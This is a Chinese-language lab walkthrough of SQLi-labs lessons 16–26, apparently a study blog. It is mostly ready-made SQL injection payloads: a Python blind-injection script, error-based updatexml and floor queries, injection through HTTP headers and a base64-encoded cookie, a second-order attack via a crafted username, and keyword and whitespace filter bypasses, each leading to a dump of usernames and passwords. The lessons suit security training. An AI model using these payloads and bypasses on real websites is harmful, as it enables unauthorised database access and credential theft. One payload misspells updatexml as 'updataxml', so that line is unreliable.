sql注入——sqlilabs16-26
文章目录
- less-16
- 3.注入
- less-17
- 2.数据库名
- 2.1 floor报错注入数据库名
- 3.查到数据表
- 3.1floor 报错注入数据表
- 4.查取列名
- 4.1 floor报错注入 列名
- 5.查取内容
- less-18
- 1.添加X-Forwarded-For测试
- 2修改User-Agent测试
- 3.查数据表名
- 4.查数据列
- 5.查取数据
- less-19
- 2.查数据库
- 3.查数据表
- 4.查数据列
- 5.查取数据
- less-20
- 2.查数据库
- 3.查数据表
- 4.查数据列
- 5.查取数据
- less-21
- 2.查数据库
- 3.查数据表
- 4.查数据列
- 5.查取数据
- less-22
- 2.查数据库
- 3.查数据表
- 4.查数据列
- 5.查取数据
- less-23
- 2.查数据库
- 3.查数据表
- 4.查数据列
- 5.查取数据
- less-24
- 创建用户admin'#
- 修改admin'#的密码
- 我们admin的密码是admin,这里我们用登录admin用户,密码用1登陆试试
- 登陆成功
- less-25
- 2.查数据库
- 3.查看数据表
- 4.查看数据列
- 常见and or 绕过
- 大小写混杂绕过:anD,Or等
- 复写绕过:anandd, oorr等
- 运算符绕过:|| (&&在url中会省略后面的参数)
- url编码绕过 |:%7c &:%26
- 5.查数据
- less-26
- 2.查询数据库
- 3.数据表
- 4.数据列
- 5.数据内容
less-16
- 发现和less15差不多,就闭合变为了”)
3.注入
import requestsurl = "http://localhost/sqlilabs/Less-16/"
def get_database(url, yuju, chishu):name = ''for i in range(1, chishu):minr = 32maxr = 129middle = (minr + maxr) // 2while minr < maxr :data = {"uname": 'admin") and ascii(substr((%s), %d, 1)) > %d -- ' % (yuju, i, middle), "passwd": "asdfadff"}request = requests.post(url, data=data)if "flag.jpg" in request.text:minr = middle + 1# print(True)else:# print(False)maxr = middlemiddle = (minr + maxr) // 2if maxr == 32:break# print(middle)name = name + chr(middle)print(name)yuju = input("输入查询语句:")
chishu = int(input('大概查询次数:'))
get_database(url, yuju, chishu)
less-17
- 这里呢我们发现uname用了过滤,passwd就没有
- 从执行顺序上看发现想进入到注入语句,$row就得有数据,所以用户得存在,然后再passwd处下功夫,用报错注入试试
2.数据库名
1' and updatexml(1,concat(0x7e,(database()),0x7e),1)--
1' and (select 1 from (select count(*), concat(database(), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) -- //floor 报错注入
2.1 floor报错注入数据库名
1' and (select 1 from (select count(*), concat(database(), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) -- //floor 报错注入
3.查到数据表
1'and updatexml(1, concat(0x7e,(select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'),0x7e),1)--
3.1floor 报错注入数据表
1' and (select 1 from (select count(*), concat((select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) --
4.查取列名
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),0x7e),1)--
4.1 floor报错注入 列名
1' and (select 1 from (select count(*), concat((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) -- //floor 报错注入
5.查取内容
1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1)--
-
很明显这里并没有注入出来,
-
这里报错的意思(你不能在查询user表时,更改表中的数据在同一语句中) 因为这里的注入点时update语句
-
我们这里语句拼接好:
-
update users set password = '1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) //这里明显有一个查user表的语句
-
1' and updatexml(1,substr(concat(0x7e,(select t.name from (select group_concat(username, 0x3a, password) as name from users ) as t),0x7e),1,32),1)-- //这里修改为创建一个新表,新表的内容为users表的内容,在查询新表
less-18
-
这里我们看到uname,passwd都有被过滤,但是他对响应信息有一个入库的操作,这里我们可以试试
-
HTPP_USER_AGENT:user_agent REMOTE_ADDR:X-Forwarded-For
-
用burp suite进行抓包,然后发送到重发部模块
1.添加X-Forwarded-For测试
- 这里呢我们不用逃逸单引号,因为insert语句这后面需要构造,为了不必要的构造,我们
X-Forwarded-For:1' and updatexml(1, concat(0x7e, (database()), 0x7e), 1) 'and '1'='1
- 没有什么用
2修改User-Agent测试
1' and updatexml(1, concat(0x7e, (database()), 0x7e), 1) and '1'='1
3.查数据表名
1' and updatexml(1, concat(0x7e, (select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), 0x7e), 1) and '1'='11' and (select 1 from (select count(*), concat((select group_concat(table_name) from information_schema.columns where table_schema = 'security'), floor(rand(0) * 2)) as x from information_schema.columns group by x) as z )and '1'='1
4.查数据列
1' and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), 0x7e), 1) and '1'='11' and (select 1 from (select count(*), concat((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), floor(rand(0)*2)) as x from information_schema.COLUMNS group by x) as y) and '1'='1
5.查取数据
1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) and '1'='1
less-19
- 这里和less-18差不多就是注入点为referer
2.查数据库
1' and updatexml(1, concat(0x7e, (database()), 0x7e), 1) and '1'='1
3.查数据表
1' and updatexml(1, concat(0x7e, (select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), 0x7e), 1) and '1'='1
4.查数据列
1' and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), 0x7e), 1) and '1'='1
5.查取数据
1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) and '1'='1
less-20
-
这里呢只展示了二次提交时候的代码,在二次提交时才会有注入点
-
完整流程大概就是,先判断你有没有cookie,没有就登录,登录通过后设置cookie的uname字段值为用户明,然后二次提交后,再回到这个页面,这次有cookie,就直接到了上面这段代码,发现二次提交时cookie可以改,没有过滤,然后有一个查表的动作,后面有报错语句,利用报错注入
-
第一次提交
-
第二次提交
2.查数据库
1' and updatexml(1, concat(0x7e, (database()), 0x7e), 1) --+
3.查数据表
1' and updatexml(1, concat(0x7e, (select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), 0x7e), 1)--+
4.查数据列
1' and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), 0x7e), 1) --+
5.查取数据
1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) --+
less-21
- 其实和less-20差不多,就多了个base64的编码解码,闭合改为了 ')
2.查数据库
1') and updatexml(1, concat(0x7e, (database()), 0x7e), 1) -- //末尾空格
编码后:MScpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChkYXRhYmFzZSgpKSwgMHg3ZSksIDEpLS0g
3.查数据表
1') and updatexml(1, concat(0x7e, (select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), 0x7e), 1)--
MScpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChzZWxlY3QgZ3JvdXBfY29uY2F0KGRpc3RpbmN0IHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hID0gJ3NlY3VyaXR5JyksIDB4N2UpLCAxKS0tIA==
4.查数据列
1') and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), 0x7e), 1) -- MScpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYSA9ICdzZWN1cml0eScgYW5kIHRhYmxlX25hbWUgPSAndXNlcnMnKSwgMHg3ZSksIDEpIC0tIA==
5.查取数据
1') and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) -- MScpIGFuZCB1cGRhdGV4bWwoMSxzdWJzdHIoY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUsMHgzYSxwYXNzd29yZCkgZnJvbSB1c2VycyksMHg3ZSksMSwzMiksMSkgLS0g
less-22
- 其实和less-22差不多,就逃逸符号为双引号
2.查数据库
1" and updatexml(1, concat(0x7e, (database()), 0x7e), 1) -- //末尾空格
编码后:MSIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgKGRhdGFiYXNlKCkpLCAweDdlKSwgMSkgLS0g
3.查数据表
1" and updatexml(1, concat(0x7e, (select group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'), 0x7e), 1)-- MSIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgKHNlbGVjdCAgZ3JvdXBfY29uY2F0KGRpc3RpbmN0IHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hID0gJ3NlY3VyaXR5JyksIDB4N2UpLCAxKS0tICA=
4.查数据列
1" and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), 0x7e), 1) -- MSIgYW5kIHVwZGF0ZXhtbCgxLCBjb25jYXQoMHg3ZSwgKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hID0gJ3NlY3VyaXR5JyBhbmQgdGFibGVfbmFtZSA9ICd1c2VycycpLCAweDdlKSwgMSkgLS0g
5.查取数据
1" and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1) -- MSIgYW5kIHVwZGF0ZXhtbCgxLHN1YnN0cihjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwweDNhLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwweDdlKSwxLDMyKSwxKSAtLSA=
less-23
- 这里它把注释(–, #)符号过滤了。将它替换成了""
- 所以我们不选择注释,改为闭合 -1’ union select 1,database(),'3
- 拼接为:select * from users where id=’ -1’ union select 1, database(), '3’ limit 0,1;
2.查数据库
?id=-1' union select 1,database(),'3
3.查数据表
?id=-1' union select 1, 2, group_concat(distinct table_name) from information_schema.columns where table_schema = 'security
4.查数据列
?id=-1' union select 1, 2, group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users
5.查取数据
?id=-1' union select 1, (select group_concat(username,0x3a,password) from users), '3
less-24
- 这个呢,注入点就是再创建用户的时候,可以用单引号和注释符,虽然单引号会被转意,但是写入库是会吧转义符去掉例如:(admin’#) 接收后(admin\‘#)写入数据库时(admin’#) ,取出时也是(admin’#)
- 这时候我们改密码时候:我们用户虽然时admin’#,但是#在数据库时注释符,再上面截屏中的更新语句中实际上更新的是admin的用户
- 所以我们可以通过admin用户登录
创建用户admin’#
修改admin’#的密码
我们admin的密码是admin,这里我们用登录admin用户,密码用1登陆试试
登陆成功
less-25
2.查数据库
?id=-1' union select 1, database(),1 --+
3.查看数据表
id=-1' union select 1, 2 , group_concat(distinct table_name) from information_schema.columns where table_schema = 'security'--+
4.查看数据列
常见and or 绕过
大小写混杂绕过:anD,Or等
- 这里失败了,因为它忽略大小写,无论带小写都会匹配上
?id=1' AnD '1'='1
复写绕过:anandd, oorr等
运算符绕过:|| (&&在url中会省略后面的参数)
?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema = 'security' anandd table_name = 'users'--+ ?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema = 'security' && table_name = 'users'--+ ?id=1' || '1'='2
url编码绕过 |:%7c &:%26
?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema = 'security' %26%26 table_name = 'users'--+
5.查数据
id=-1' union select 1,group_concat(username), group_concat(password) from users --+
less-26
- 这里呢过滤了and or 忽略大小写:这点倒是可以过滤比如 编码 复写
- 还有注释符-- #:通过闭合来绕过
- 至于空格:可以用多行注释(/**/,用(),``来界定,或者其他字符代替
2.查询数据库
?id=-1' || updataxml(1,concat(0x7e,database(),0x7e),1)oorr'1'='1
3.数据表
?id=-1' || updatexml(1,concat(0x7e,(select(group_concat(distinct `table_name`))from(infoorrmation_schema.columns)where `table_schema`='security'),0x7e),1)oorr'1'='1
4.数据列
id=1' || updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where `table_schema`='security'anandd`table_name`='users'),0x7e),1)anandd'1'='1
5.数据内容
?id=-1'||updatexml(1,substr(concat(0x7e,(select(group_concat(username,0x3a,passwoorrd))from(users)),0x7e),1,32),1)aandnd'1'='1